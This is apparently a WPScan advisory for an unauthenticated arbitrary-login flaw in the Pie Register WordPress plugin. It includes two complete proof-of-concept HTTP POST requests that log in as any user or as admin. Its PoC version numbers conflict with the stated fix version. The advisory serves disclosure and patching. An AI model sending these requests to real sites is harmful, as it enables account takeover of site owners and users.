WordPress Plugin Vulnerabilities
Pie Register < 3.1.7.6 - Unauthenticated Arbitrary Login
Description
The plugin has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username
Proof of Concept
/pie-register-login/ is the login page of the plugin, ie the one with [pie_register_login] v < 3.7.1.5 POST /pie-register-login/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 115 Connection: close Upgrade-Insecure-Requests: 1 log=a&pwd=a&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1 v < 3.7.1.6 POST /pie-register-login/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 49 Connection: close Upgrade-Insecure-Requests: 1 log=admin&pwd=a&social_site=true&wp-submit=Log+In
Affects Plugins
Fixed in 3.1.7.6 References
CVE
Classification
Type
AUTHBYPASS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
AyeCode Ltd
Submitter
Stiofan
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-11 (about 2 years ago)
Added
2021-10-11 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)
WPScan 